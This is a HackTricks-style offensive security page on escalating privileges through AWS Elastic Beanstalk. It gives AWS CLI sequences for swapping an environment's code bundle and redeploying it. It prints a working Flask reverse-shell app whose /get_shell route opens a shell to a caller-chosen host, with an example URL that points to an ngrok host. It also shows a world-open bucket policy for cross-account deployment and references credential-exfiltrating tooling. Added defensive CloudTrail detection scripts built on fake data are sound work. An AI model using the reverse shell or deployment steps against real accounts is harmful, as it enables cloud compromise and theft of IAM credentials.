AWS - Elastic Beanstalk Privesc

Support HackTricks

Elastic Beanstalk

More information about Elastic Beanstalk in:

AWS - Elastic Beanstalk Enum

To perform sensitive actions in Beanstalk you will need a lot of sensitive permissions across many different services. You can check, for example, the permissions granted by arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, S3 write permissions & many others

With write permissions over the S3 bucket that stores the code of the environment and permissions to rebuild the application (elasticbeanstalk:RebuildEnvironment plus a few others related to S3, EC2 and CloudFormation are required), you could modify the code and rebuild the app; the next time the app is accessed it will execute your new code, allowing the attacker to compromise the application and the credentials of its IAM role.

```bash
# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
```
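From the defender's side, the sequence above leaves a recognisable trail in CloudTrail: an object write into the account's `elasticbeanstalk-<region>-<accId>` bucket followed shortly by a `RebuildEnvironment` (or `UpdateEnvironment`) call from the same principal. The following detection script is an added example written for this page, not HackTricks code: it correlates those two event types over a list of constructed, fake CloudTrail records, ignores an assumed allowlist of deployment roles (`DEPLOY_ROLES`), and reports any other principal that wrote a bundle and then triggered a rebuild within a 15-minute window. Field names follow the CloudTrail record format for S3 and Elastic Beanstalk data/management events; the account id, role names and bundle keys in the sample are invented.

```python
from datetime import datetime, timedelta

# Constructed sample CloudTrail records (fake account 111111111111, fake roles):
# alice writes a bundle and rebuilds the environment; the CI role does the same legitimately.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/dev-user/alice"},
     "requestParameters": {"bucketName": "elasticbeanstalk-eu-west-1-111111111111",
                           "key": "1692777270420-aws-flask-app.zip"}},
    {"eventTime": "2024-01-01T10:04:00Z", "eventSource": "elasticbeanstalk.amazonaws.com",
     "eventName": "RebuildEnvironment",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/dev-user/alice"},
     "requestParameters": {"environmentName": "prod-env"}},
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ci-deploy-role/pipeline"},
     "requestParameters": {"bucketName": "elasticbeanstalk-eu-west-1-111111111111",
                           "key": "1692777270421-aws-flask-app.zip"}},
    {"eventTime": "2024-01-01T11:02:00Z", "eventSource": "elasticbeanstalk.amazonaws.com",
     "eventName": "RebuildEnvironment",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ci-deploy-role/pipeline"},
     "requestParameters": {"environmentName": "prod-env"}},
]

# Hypothetical allowlist of roles that are expected to write bundles and rebuild environments.
DEPLOY_ROLES = {"ci-deploy-role"}
BUNDLE_WRITES = {"PutObject", "CopyObject", "CompleteMultipartUpload"}
REBUILD_CALLS = {"RebuildEnvironment", "UpdateEnvironment"}
WINDOW = timedelta(minutes=15)


def role_name(arn):
    """Extract the role name from an assumed-role session ARN, or the user name for IAM users."""
    parts = arn.split(":")[-1].split("/")
    if parts[0] == "assumed-role" and len(parts) > 1:
        return parts[1]
    return parts[-1]


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def find_bundle_tampering(events, deploy_roles=DEPLOY_ROLES, window=WINDOW):
    """Return one finding per Elastic Beanstalk bundle write by a non-deployment principal
    that the same principal follows with a rebuild/update of an environment within `window`."""
    findings = []
    pending = []  # (time, principal arn, bucket, key) of bundle writes awaiting a rebuild
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        params = ev.get("requestParameters") or {}
        arn = ev["userIdentity"]["arn"]
        when = parse_time(ev["eventTime"])
        if role_name(arn) in deploy_roles:
            continue  # expected pipeline activity, not of interest here
        if (ev["eventSource"] == "s3.amazonaws.com" and ev["eventName"] in BUNDLE_WRITES
                and params.get("bucketName", "").startswith("elasticbeanstalk-")):
            pending.append((when, arn, params["bucketName"], params.get("key")))
        elif ev["eventSource"] == "elasticbeanstalk.amazonaws.com" and ev["eventName"] in REBUILD_CALLS:
            for wrote_at, writer, bucket, key in pending:
                if writer == arn and timedelta(0) <= when - wrote_at <= window:
                    findings.append({"principal": arn, "bucket": bucket, "key": key,
                                     "environment": params.get("environmentName"),
                                     "rebuild_event": ev["eventName"]})
    return findings


if __name__ == "__main__":
    for f in find_bundle_tampering(SAMPLE_EVENTS):
        print("bundle replaced and environment rebuilt by non-deploy principal:", f)
```

The allowlist is the important tuning knob: in most accounts only a CI role should ever write to the Elastic Beanstalk bucket, so even the bundle write alone (without the rebuild) from any other principal is worth alerting on. Restricting `s3:PutObject` on that bucket to the deployment role with a bucket policy removes the precondition entirely.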

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, and more...

The permissions mentioned, plus a number of S3, EC2, cloudformation, autoscaling and elasticloadbalancing permissions, are needed to create an Elastic Beanstalk environment from scratch.

  • Create an AWS Elastic Beanstalk application:

```bash
aws elasticbeanstalk create-application --application-name MyApp
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
```

If an environment is already created and you don't want to create a new one, you can just update the existing one.

  • Package your application code and its dependencies into a ZIP file:

```bash
zip -r MyApp.zip .
```

  • Upload the ZIP file to an S3 bucket:

```bash
aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
```

  • Create an AWS Elastic Beanstalk application version:

```bash
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
```

  • Deploy the application version to your AWS Elastic Beanstalk environment:

```bash
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
```

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses

First of all you need to create a legitimate Beanstalk environment in your own account with the code you would like to run in the victim, following the previous steps. Potentially a simple zip containing these 2 files; the application code is:

```python
from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)


@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')


@application.route("/")
def index():
    return jsonify('Welcome!')


@application.route("/get_shell")
def search():
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')


if __name__ == "__main__":
    application.run()
```

Once you have your Beanstalk environment running your rev shell, it's time to migrate it to the victim's environment. To do so you need to update the Bucket Policy of your Beanstalk S3 bucket so the victim can access it (note that this will open the bucket to EVERYONE):

```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "s3:ListBucket",
        "s3:ListBucketVersions",
        "s3:GetObject",
        "s3:GetObjectVersion",
        "s3:*"
      ],
      "Resource": [
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
      ]
    },
    {
      "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
      "Effect": "Deny",
      "Principal": {
        "AWS": "*"
      },
      "Action": "s3:DeleteBucket",
      "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
    }
  ]
}
```
```bash
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# This step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-2.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
```
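Two things in this migration are easy to audit for. The bucket policy that makes the attacker's bucket world-readable is an `Allow` statement with `Principal` `*`, and the `CreateApplicationVersion` call in the victim account points at a source bundle in a bucket that does not follow the victim's own `elasticbeanstalk-<region>-<accountId>` naming. The script below is an added example for this page, not HackTricks or AWS code. It checks a constructed bucket policy (same shape as the one above, with a fake account id) for public `Allow` statements, and inspects constructed `CreateApplicationVersion` CloudTrail records for a source-bundle bucket belonging to another account. The `requestParameters.sourceBundle.s3Bucket` and `recipientAccountId` field names are assumed from the CloudTrail record format; the account ids, bucket names and version labels are invented.

```python
import json
import re

# Constructed bucket policy in the shape of the one above (fake account id 111111111111).
SAMPLE_POLICY = json.loads("""
{
  "Version": "2008-10-17",
  "Statement": [
    {"Sid": "public-read", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:ListBucket", "s3:GetObject", "s3:*"],
     "Resource": ["arn:aws:s3:::elasticbeanstalk-us-east-1-111111111111",
                  "arn:aws:s3:::elasticbeanstalk-us-east-1-111111111111/*"]},
    {"Sid": "no-delete", "Effect": "Deny", "Principal": {"AWS": "*"},
     "Action": "s3:DeleteBucket",
     "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-111111111111"}
  ]
}
""")

# Constructed CloudTrail records as seen in the victim account 111111111111:
# the first deploys from the account's own bucket, the second from a foreign one.
SAMPLE_EVENTS = [
    {"eventName": "CreateApplicationVersion", "recipientAccountId": "111111111111",
     "requestParameters": {"applicationName": "MyApp", "versionLabel": "MyApp-1.0",
                           "sourceBundle": {"s3Bucket": "elasticbeanstalk-us-east-1-111111111111",
                                            "s3Key": "MyApp.zip"}}},
    {"eventName": "CreateApplicationVersion", "recipientAccountId": "111111111111",
     "requestParameters": {"applicationName": "MyApp", "versionLabel": "MyApp-2.0",
                           "sourceBundle": {"s3Bucket": "elasticbeanstalk-us-east-1-222222222222",
                                            "s3Key": "bundle.zip"}}},
]

EB_BUCKET = re.compile(r"^elasticbeanstalk-(?P<region>[a-z0-9-]+)-(?P<account>\d{12})$")


def _is_everyone(principal):
    """True for the two ways a policy grants access to anyone: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or aws == ["*"]
    return False


def public_statements(policy):
    """Return (Sid, actions) for every Allow statement open to everyone.
    Deny statements with Principal "*" are normal in EB bucket policies and are skipped."""
    found = []
    for st in policy.get("Statement", []):
        if st.get("Effect") == "Allow" and _is_everyone(st.get("Principal")):
            actions = st.get("Action", [])
            found.append((st.get("Sid"), [actions] if isinstance(actions, str) else actions))
    return found


def foreign_source_bundle(event):
    """For a CreateApplicationVersion record, return the source-bundle bucket name when it is
    not the recording account's own elasticbeanstalk-<region>-<account> bucket (a non-standard
    bucket name is also returned so it gets reviewed); return None for the normal case."""
    if event.get("eventName") != "CreateApplicationVersion":
        return None
    bundle = (event.get("requestParameters") or {}).get("sourceBundle") or {}
    bucket = bundle.get("s3Bucket", "")
    match = EB_BUCKET.match(bucket)
    if match is None or match.group("account") != event.get("recipientAccountId"):
        return bucket
    return None


if __name__ == "__main__":
    for sid, actions in public_statements(SAMPLE_POLICY):
        print(f"public Allow statement {sid!r} grants {actions}")
    for ev in SAMPLE_EVENTS:
        bucket = foreign_source_bundle(ev)
        if bucket:
            print(f"{ev['requestParameters']['versionLabel']} deployed from foreign bucket {bucket}")
```

In practice the policy check belongs on the attacker-side artefact only when you are auditing your own accounts for accidentally public Elastic Beanstalk buckets; the source-bundle check is the one to run in the victim account's CloudTrail, ideally with an S3 Block Public Access setting and a deployment role allowlist in place so the cross-account deployment cannot happen in the first place.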

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.